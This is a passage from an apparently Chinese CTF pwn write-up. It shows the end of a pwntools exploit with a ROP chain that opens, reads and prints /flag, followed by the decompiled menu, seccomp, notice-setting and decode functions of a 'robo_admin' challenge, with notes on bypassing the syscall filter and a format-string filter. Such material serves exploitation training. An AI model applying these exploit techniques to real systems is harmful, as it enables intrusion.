class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">login</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AAA0&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;BBB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">writemail</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">fake_io</span><span class="p">),</span> <span class="n">fake_io</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">logout</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">login</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">user2user</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">admin_logout</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">myexit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">orw_rop_chain</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">2</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span><span class="p">,</span> <span class="c1"># open(&#34;/flag&#34;)</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">3</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span><span class="p">,</span> <span class="c1"># read(3, buf, 0x100)</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span> <span class="c1"># write(1, buf, 0x100)</span> </span></span><span class="line"><span class="cl"> <span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">#gdb.attach(io)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Goodbye!</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">orw_rop_chain</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h1 id="区域决赛">区域决赛 </h1><h2 id="robo_admin">robo_admin </h2><p>呜呜呜我好菜啊比赛时怎么做不出来呜呜呜</p> <h3 id="checksec-1">checksec </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[*] &#39;/home/RatherHard/CTF-pwn/ccsssc/robo_admin/题目附件/robo_admin&#39; </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Full RELRO </span></span><span class="line"><span class="cl"> Stack: Canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: PIE enabled </span></span><span class="line"><span class="cl"> SHSTK: Enabled </span></span><span class="line"><span class="cl"> IBT: Enabled </span></span></code></pre></td></tr></table> </div> </div><h3 id="ida-1">IDA </h3><h4 id="mystart">mystart </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="nf">mystart</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">nptr</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-20h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">seccomp</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">clear</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">pwdgen</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Robo Admin Service&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">=== Main Menu ===&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. set notice&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. show status&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;3. admin login&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;4. exit&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&gt; &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">nptr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">myread</span><span class="p">(</span><span class="n">nptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v0</span> <span class="o">=</span> <span class="nf">atoi</span><span class="p">(</span><span class="n">nptr</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v0</span> <span class="o">==</span> <span class="mi">4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v0</span> <span class="o">&gt;</span> <span class="mi">4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_13</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">switch</span> <span class="p">(</span> <span class="n">v0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">3</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="n">judger</span> <span class="o">=</span> <span class="nf">admin_judge</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">judger</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">admin_panel</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">1</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">setnotice</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">2</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">showstatus</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">default</span><span class="o">:</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_13</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] invalid&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;bye&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>菜单题</p> <h4 id="seccomp">seccomp </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="nf">seccomp</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v1</span> <span class="o">=</span> <span class="nf">seccomp_init</span><span class="p">(</span><span class="mi">2147418112</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">v1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">seccomp_rule_add</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">seccomp_rule_add</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">59</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">seccomp_rule_add</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">322</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">seccomp_load</span><span class="p">(</span><span class="n">v1</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">seccomp_release</span><span class="p">(</span><span class="n">v1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>禁用了 open 和 execve ,可以用 openat</p> <h4 id="setnotice">setnotice </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">setnotice</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">src</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-310h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+100h] [rbp-210h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+108h] [rbp-208h] </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="n">v4</span><span class="p">[</span><span class="mi">496</span><span class="p">];</span> <span class="c1">// [rsp+110h] [rbp-200h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+308h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">s</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">v4</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">v4</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">src</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="nf">myread</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="nf">strchr</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">37</span><span class="p">)</span> <span class="o">||</span> <span class="nf">strchr</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">36</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] raw input contains illegal chars&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)((</span><span class="kr">__int64</span> <span class="p">(</span><span class="kr">__fastcall</span> <span class="o">*</span><span class="p">)(</span><span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="n">_QWORD</span> <span class="o">*</span><span class="p">,</span> <span class="kr">__int64</span><span class="p">))</span><span class="n">decode</span><span class="p">)(</span><span class="n">s</span><span class="p">,</span> <span class="n">src</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] decode failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">notice</span><span class="p">,</span> <span class="n">src</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">notice</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">byte_52BF</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">ntc_tag</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[+] notice updated&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v5</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>禁止明文出现 &lsquo;%&rsquo; 和 &lsquo;$&rsquo; ,防止直接的格式化字符串攻击</p> <h4 id="decode">decode </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">decode</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">a3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// [rsp+24h] [rbp-14h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-10h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v9</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="n">i</span><span class="p">);</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">a3</span> <span class="o">&lt;=</span> <span class="n">v9</span> <span class="o">+</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mh">0xFFFFFFFFLL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">==</span> <span class="mi">92</span> <span class="o">&amp;&amp;</span> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">120</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="nf">decodechr</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="o">*</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">+</span> <span class="n">a1</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="nf">decodechr</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="o">*</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">3</span> <span class="o">+</span> <span class="n">a1</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v7</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">v8</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mh">0xFFFFFFFFLL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="n">v9</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">a2</span> <span class="o">+</span> <span class="n">v4</span><span class="p">)</span> <span class="o">=</span> <span class="n">v8</span> <span class="o">|</span> <span class="p">(</span><span class="mi">16</span> <span class="o">*</span> <span class="n">v7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">i</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">v9</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">v5</span> <span class="o">+</span> <span class="n">a2</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="n">i</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span 